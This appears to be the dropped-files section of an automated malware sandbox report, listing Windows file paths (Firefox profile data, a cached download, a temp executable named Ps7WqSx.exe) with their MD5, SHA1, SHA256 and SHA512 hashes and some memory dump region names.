C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\22c17877-1efc-4e5f-a64c-c5c18b1b4ff2

MD5 acec018a52105f93b4e2811d0e1acf28
SHA1 e703a7541bf403caf3963fd048159ae2f38b6803
SHA256 a04208b6ec80c2c961b2db2bd05b95a9f834500b0140fec50d298dac31d72f08
SHA512 24960c8591e1f67bd458ca3cac7dd734a0bb33268c5d4bbb8b4a1bfb0378fc7da746e43a64d6664f0d5c450d37ed3edd06523234a1110340e1e47dd8d2020f40

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\e8da15b7-baa7-4068-a86e-36255804da84

MD5 6042b785f9b8cc0259c6bd0ac2879ceb
SHA1 10aab68c03f3d15b29196d792368d23c059d54af
SHA256 b1f657f0281fb1897b9d8182f5734b09fec7ce3bbf0762af365ecd6b8cf6d483
SHA512 b51c764d926fafeaf1082537705b861304deea3db560c9bbc18909887a094e370d3a05494f7e27d6afe1abeb03d64b5282623132d1cb96353afdd4fc5f62a2d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin

MD5 b6e64af78b542c87f8391499d8f60f62
SHA1 1becfcc3eee1358a7d86237db00244e837d0dd6b
SHA256 6653478cfab6dd59f315e6e53b5037bcfd2a4cf9c1cd1655e64a0873a3ba4221
SHA512 b7ecae9479363c18e6b84a46fb8bf29f6e3e3d3b20b1ece2d5d8f24618d77d80ae26cf8625e869639e37d7ac53c5e5952daa77da121fe0c64488edafbb2690d8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\pending_pings\54b2501c-c134-4c7a-98c4-c375cb200c11

MD5 ebaa74f2fe9b7c0aa2d6d5cec3d3509e
SHA1 bb9a3553589f63e2a8bc3daf91717208aa840d01
SHA256 e1521a200b12a09321236e54e0158a2d022641c0e28954eceee75d4866df132e
SHA512 c915cf6f2f02d90d10e20d67e41cbdb456e85ecc5ea861167a3d7339ed1b5b999f9ca7514ebddd61d547478928e5da4ade65a8c0d4a494818e78a8991b3ad002

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 7cf617b51b2029061a8c6a1216c159e8
SHA1 7f1dea5ecf532b8c2a6888a56dced55a96e12846
SHA256 693ef7e861cd9159da536a4f611bce85f0943ace7cfb09bbad83960f83c5b42c
SHA512 7d61292e442c285a9275c4f060680c8773b2e80b2d8a652d687ba6b94d9ad4112283e18f0a5253e1bd4575199c4692d1f7ab96dca41bb8c823e9b18bfde52a11

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 fb8e1a4f79179685b410ccc493feb488
SHA1 e8f9f0c60e734313c33c33e0026efe26ad0f9541
SHA256 9b203a6b9078008ad91ba0da1d6251241c9e5853e14c69319027315fb985cc33
SHA512 9440d04c875225683ae661b3a7bfabe893f6e05df537d00dda936fc72b930f1ae9dab9c7c553bb0d45fd7218d3e631c6881609c99979c2feb5b332f565c4a421

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs.js

MD5 30c18a82bccb56db9919143246de7b0b
SHA1 d2150c8306b6866c0a9a17f3ff0f453e68cbe70e
SHA256 9549fd7a9b82cc0915fec95b3f6197085e4bdf42c0496a61424e9f869ab6733d
SHA512 0a24359fd741bdd73aeb957e2b441b137d8bd385b413d0b0abdc8938340690820221326e09257bd5e49078cf88e3eb3cc258b8b4c01c650fffc61a6c3b213ac7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\AlternateServices.bin

MD5 f92ebacb935a2886788b25e597b1fb21
SHA1 e8cb46327daa2d85a5dea1515ec0375b65bcf19e
SHA256 f4fc6c5493db7dcc4db52897c19d5740e51c96b446f7ac3637d9d8d637a27d52
SHA512 6851bd17feda7785d5c35b825c3e5080354897053e58600b42f704836325a14569f47dde6968734b704d828fcef401a6b656e0da74aedab158bf076d55c13dc9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\outbhah2.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZKC1FSM4\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/464-1101-0x00000000009D0000-0x0000000000E42000-memory.dmp

memory/464-1104-0x00000000009D0000-0x0000000000E42000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 afbeeff9e834a84f4d159a23dc75415c
SHA1 c115fa7e7e84a7cf52b874b68178f82a1d82113f
SHA256 1d38c3105238a12744049011dfdc47d2b4cb8d86c09775b3e22b528d9b44db2b
SHA512 a128b92e9ef605fb2d589d5936b55dcf797fd0e800a6a438ed9a5b1368a0638f0e63c372c0db89687aeaa052f3420314e0ad078906ef640a36527f0938e534a8

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

MD5 3c345db2fa2f45fea77744d2c67395b7
SHA1 3364aa7e099de25907cf64a9a05526876b2f456c
SHA256 f3ee964602d42a4a3fe43f466844ced7867da9435ce39b2d7f88ab31d424e8a6
SHA512 c593932afd38406bcbe8aa92bdeb378bdac8d974cf991cbe1aafe7e49f7a6a64150d3d4a2aacf3489bae028a17e6b38b3aab7a333fa792c3dfee26965ff72f50

memory/5424-1161-0x0000000000250000-0x000000000093E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs-1.js

MD5 205f5c11fd49f08ad0720a29fbfb418f
SHA1 71f626ae4a004e2a88a56709692fc1c43ca27a0e
SHA256 4e37aa62e92b5934f603eccd92dd86214689f890d4d894b966534aab805a4ae4
SHA512 c1c8ae38aae6302e0128dbbb2b1c02985a27ff58ac2f438df21af614436b8a014b8119266e21fe9fa1982131df97006fa4f1c1e7ab1ae3f42e162c2113397fc5